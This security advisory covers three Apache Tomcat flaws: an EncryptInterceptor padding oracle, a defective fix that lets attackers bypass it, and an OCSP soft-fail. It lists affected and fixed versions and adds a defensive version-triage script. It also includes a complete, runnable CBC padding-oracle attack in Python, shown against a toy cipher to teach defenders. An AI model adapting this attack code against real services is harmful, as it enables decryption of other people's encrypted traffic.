Critical Apache Tomcat Flaws Let Attackers Bypass EncryptInterceptor

By David kimber
April 13, 2026

Key Takeaways

  • The Apache Software Foundation has released security updates for Apache Tomcat addressing three related vulnerabilities.
  • The first fix for a padding oracle in the EncryptInterceptor (CVE-2026-29146) was itself defective and introduced CVE-2026-34486, which lets an attacker bypass the EncryptInterceptor entirely.
  • A third issue, CVE-2026-34500, makes OCSP checks soft-fail when the FFM API is in use even if soft-fail has been disabled, so CLIENT_CERT authentication can succeed when it should fail.
  • Apache Tomcat 11.x, 10.x and 9.x are affected, including the 11.0.20, 10.1.53 and 9.0.116 releases that carried the first, flawed fix.
  • Upgrade to 11.0.21, 10.1.54 or 9.0.117 (or later); End-of-Life branches receive no fix and must be migrated.

The Apache Software Foundation has issued a series of security updates for Apache Tomcat addressing three vulnerabilities. The advisories stand out because a patching error in the first round of fixes introduced a complete bypass of the EncryptInterceptor; the other two issues are a padding oracle in that same component and an OCSP soft-fail that weakens client-certificate authentication.

System administrators are strongly advised to update their Apache Tomcat deployments without delay to mitigate potential exploitation and secure their environments.

Flawed Patch Leads to EncryptInterceptor Bypass

The chain begins with CVE-2026-29146, rated "Important", reported by Uri Katz and Avi Lumelsky of Oligo Security. Tomcat's EncryptInterceptor, the Tribes channel interceptor that encrypts cluster traffic such as replicated session state between nodes, defaulted to Cipher Block Chaining (CBC) with padding. CBC alone provides no integrity protection, so an attacker on the cluster network who can send modified ciphertext to a node and observe whether it rejects the padding can mount a padding oracle attack and decrypt intercepted traffic block by block without ever learning the key.
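The attack the paragraph describes, as an added example that is not code from Tomcat or from the Oligo researchers. Everything here is a stand-in: the block cipher is a small SHA-256-keyed Feistel network so the script runs on the standard library alone, the PaddingOracle class plays the role of a node that reveals only whether padding was valid, and the sample message is constructed. The attack itself is the general CBC padding oracle attack and does not depend on which block cipher sits underneath, which is why a CBC-with-padding default is a problem regardless of key length.

```python
"""CBC padding-oracle attack, end to end, against a toy block cipher.
Added example, not Tomcat code: the cipher is a stand-in (4-round Feistel
network keyed with SHA-256); the attack needs only CBC mode, PKCS#7 padding
and an oracle that reveals whether padding was valid."""
import hashlib
import os

BLOCK = 16

def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def _round(key: bytes, i: int, half: bytes) -> bytes:  # keyed Feistel round, 8 bytes out
    return hashlib.sha256(key + bytes([i]) + half).digest()[:8]

def block_encrypt(key: bytes, block: bytes) -> bytes:
    left, right = block[:8], block[8:]
    for i in range(4):
        left, right = right, _xor(left, _round(key, i, right))
    return left + right

def block_decrypt(key: bytes, block: bytes) -> bytes:
    left, right = block[:8], block[8:]
    for i in reversed(range(4)):
        left, right = _xor(right, _round(key, i, left)), left
    return left + right

def pad(data: bytes) -> bytes:
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def unpad(data: bytes) -> bytes:
    n = data[-1] if data else 0
    if n < 1 or n > BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]

def cbc_encrypt(key: bytes, iv: bytes, padded: bytes) -> bytes:
    out, prev = [], iv
    for i in range(0, len(padded), BLOCK):
        prev = block_encrypt(key, _xor(padded[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)

def cbc_decrypt(key: bytes, iv: bytes, ciphertext: bytes) -> bytes:
    out, prev = [], iv
    for i in range(0, len(ciphertext), BLOCK):
        out.append(_xor(block_decrypt(key, ciphertext[i:i + BLOCK]), prev))
        prev = ciphertext[i:i + BLOCK]
    return b"".join(out)

class PaddingOracle:
    """The victim: decrypts and leaks only padding validity (error, log line or timing)."""
    def __init__(self, key: bytes):
        self._key, self.queries = key, 0
    def __call__(self, iv: bytes, ciphertext: bytes) -> bool:
        self.queries += 1
        try:
            unpad(cbc_decrypt(self._key, iv, ciphertext))
            return True
        except ValueError:
            return False

def recover_block(oracle, prev: bytes, target: bytes) -> bytes:
    """Recover one plaintext block from oracle answers alone: force padding 0x01,
    then 0x02 0x02, ... from the last byte back; each accepted forged 'IV' byte
    reveals one byte of D(target), and plaintext = D(target) XOR prev."""
    inter = bytearray(BLOCK)
    for pos in range(BLOCK - 1, -1, -1):
        padv = BLOCK - pos
        forged = bytearray(BLOCK)
        for j in range(pos + 1, BLOCK):
            forged[j] = inter[j] ^ padv
        for guess in range(256):
            forged[pos] = guess
            if not oracle(bytes(forged), target):
                continue
            if pos == BLOCK - 1:  # rule out a lucky 0x02 0x02 instead of 0x01
                check = bytearray(forged)
                check[pos - 1] ^= 0xFF
                if not oracle(bytes(check), target):
                    continue
            inter[pos] = guess ^ padv
            break
        else:
            raise RuntimeError("no guess accepted: the oracle is not leaking padding")
    return _xor(inter, prev)

def padding_oracle_attack(oracle, iv: bytes, ciphertext: bytes) -> bytes:
    blocks = [iv] + [ciphertext[i:i + BLOCK] for i in range(0, len(ciphertext), BLOCK)]
    plain = b"".join(recover_block(oracle, blocks[i - 1], blocks[i])
                     for i in range(1, len(blocks)))
    return unpad(plain)

SAMPLE_MESSAGE = b"session 7f3a: user=alice; role=admin"  # constructed stand-in for replicated state

def demo():
    """Encrypt under a key the attacker never sees, then recover it through the oracle."""
    key, iv = os.urandom(16), os.urandom(16)
    ciphertext = cbc_encrypt(key, iv, pad(SAMPLE_MESSAGE))
    oracle = PaddingOracle(key)
    return padding_oracle_attack(oracle, iv, ciphertext), oracle.queries
```

Running `demo()` returns the original message plus the number of oracle calls it took, on the order of a hundred or so per plaintext byte. The point for defenders is that nothing in the attack touches the key: the only thing a mode without integrity protection needs to hand over is a yes/no answer about padding, so the fix is an authenticated mode or an integrity check before decryption, not a longer key.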

Apache shipped a first round of updates to address this weakness. That fix was itself defective and introduced a second vulnerability, CVE-2026-34486, found by Bartlomiej Dmitruk of striga.ai, which allows an attacker to bypass the EncryptInterceptor entirely. Organizations that upgraded to the intermediate releases carrying that first fix (11.0.20, 10.1.53 and 9.0.116) are exposed to the bypass and need to move to the corrected releases.

Certificate Validation Failures and Padding Oracle Attacks

Apache also resolved CVE-2026-34500, rated "Moderate", in Tomcat's Online Certificate Status Protocol (OCSP) checking. Reported by Haruki Oyama of Waseda University, the flaw appears under specific conditions when the Foreign Function and Memory (FFM) API is in use: the OCSP check soft-fails, treating an unavailable or failed revocation check as a pass, even when the administrator has explicitly disabled soft-fail.

The consequence is that CLIENT_CERT authentication does not fail when it should, so a certificate whose revocation status could not be confirmed may be accepted, undermining the access controls that depend on that authentication.

Affected Versions and Recommended Updates

The vulnerabilities span multiple branches of Apache Tomcat. Specifically, the flawed patch that enables the EncryptInterceptor bypass (CVE-2026-34486) affects:

  • Apache Tomcat 11.0.20
  • Apache Tomcat 10.1.53
  • Apache Tomcat 9.0.116

The initial padding oracle (CVE-2026-29146) and the OCSP soft-fail (CVE-2026-34500) affect the wider ranges below:

  • Apache Tomcat 11.0.0-M1 through 11.0.20
  • Apache Tomcat 10.1.0-M1 through 10.1.53
  • Apache Tomcat 9.0.13 through 9.0.116

To fully address all three vulnerabilities—the flawed EncryptInterceptor patch, the padding oracle attack, and the OCSP certificate validation failure—administrators must upgrade their systems to the latest secure releases. The Apache Software Foundation strongly advises applying the following updates:

  • Upgrade Apache Tomcat 11.x deployments to version 11.0.21 or later
  • Upgrade Apache Tomcat 10.x deployments to version 10.1.54 or later
  • Upgrade Apache Tomcat 9.x deployments to version 9.0.117 or later

Organizations operating older, End-of-Life (EOL) versions of Tomcat must migrate to a supported branch immediately, as these legacy systems will not receive patches for these critical flaws.

What You Should Do

  • Immediately identify all Apache Tomcat instances within your environment.
  • Verify the current version of each Apache Tomcat deployment.
  • Prioritize upgrading all affected versions to Apache Tomcat 11.0.21, 10.1.54, or 9.0.117, or newer.
  • For any End-of-Life (EOL) Tomcat versions, plan and execute a migration to a currently supported branch as soon as possible.
  • Monitor Apache Software Foundation security advisories for any further updates or emerging threats related to Tomcat.
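A triage script for the first three steps above, added here as an example and not Apache's own tooling. It reads the version that Tomcat stores in lib/catalina.jar (the ServerInfo.properties resource) under each CATALINA_HOME directory you pass on the command line, then compares it with the fixed releases named in this article. The fixed and flawed-patch version numbers are taken from the text; the SAMPLE_PROPERTIES string is a constructed stand-in for the real file so the comparison logic can be exercised without a Tomcat install.

```python
"""Triage installed Tomcat versions against the fixed releases in this advisory.
Added example, not Apache tooling. Fixed versions come from the article
(11.0.21, 10.1.54, 9.0.117); the flawed-patch builds are the release just
before each. Reads lib/catalina.jar, whose ServerInfo.properties resource
carries the build version, so it runs offline across CATALINA_HOME dirs."""
import re
import sys
import zipfile
from pathlib import Path

FIXED = {(11, 0): 21, (10, 1): 54, (9, 0): 117}   # branch -> first fixed patch level
VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)(?:-M(\d+))?")
PROPERTIES = "org/apache/catalina/util/ServerInfo.properties"

def parse_version(text: str) -> tuple:
    """'9.0.116', 'Apache Tomcat/11.0.0-M1' or '10.1.53.0' -> sortable tuple;
    a milestone such as -M1 sorts below the final release of that number."""
    m = VERSION_RE.search(text)
    if not m:
        raise ValueError(f"no Tomcat version in {text!r}")
    major, minor, patch, milestone = m.groups()
    return (int(major), int(minor), int(patch),
            0 if milestone else 1, int(milestone or 0))

def assess(version_text: str) -> str:
    """One of: fixed, affected-flawed-patch, affected, unlisted."""
    v = parse_version(version_text)
    branch = v[:2]
    if branch not in FIXED:
        # 8.5.x and older are End-of-Life and get no fix; a branch newer than
        # the advisory has to be checked against its own release notes.
        return "unlisted"
    if v >= branch + (FIXED[branch], 1, 0):
        return "fixed"
    if v == branch + (FIXED[branch] - 1, 1, 0):
        return "affected-flawed-patch"   # 11.0.20 / 10.1.53 / 9.0.116: CVE-2026-34486
    return "affected"

def version_from_properties(props: str) -> str:
    """Pull the 'server.info=Apache Tomcat/x.y.z' value out of ServerInfo.properties."""
    for line in props.splitlines():
        if line.startswith("server.info="):
            return line.split("=", 1)[1].strip()
    raise ValueError("server.info missing from ServerInfo.properties")

def installed_version(catalina_home: Path) -> str:
    with zipfile.ZipFile(catalina_home / "lib" / "catalina.jar") as jar:
        return version_from_properties(jar.read(PROPERTIES).decode("utf-8"))

ADVICE = {
    "fixed": "no action for this advisory",
    "affected-flawed-patch": "carries the defective EncryptInterceptor patch; upgrade now",
    "affected": "upgrade to the fixed release for this branch",
    "unlisted": "branch not covered by the advisory; migrate or check its own release notes",
}

# Constructed sample of the properties resource as a 9.0.116 build would write it.
SAMPLE_PROPERTIES = "server.info=Apache Tomcat/9.0.116\nserver.number=9.0.116.0\n"

def main(argv):
    if not argv:
        print("usage: tomcat_triage.py CATALINA_HOME [CATALINA_HOME ...]")
        return
    for home in argv:
        try:
            version = installed_version(Path(home))
        except (OSError, KeyError, ValueError) as exc:
            print(f"{home}: could not read version ({exc})")
            continue
        status = assess(version)
        print(f"{home}: {version} -> {status}: {ADVICE[status]}")

if __name__ == "__main__":
    main(sys.argv[1:])
```

Point it at every Tomcat root an inventory turns up (`python3 tomcat_triage.py /opt/tomcat /srv/app/tomcat`); anything reported as affected-flawed-patch is a host that was patched once already and still needs the second upgrade. Versions are compared as tuples rather than strings so that 9.0.116 is correctly ordered below 9.0.117 and a milestone build sorts below the release it precedes.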
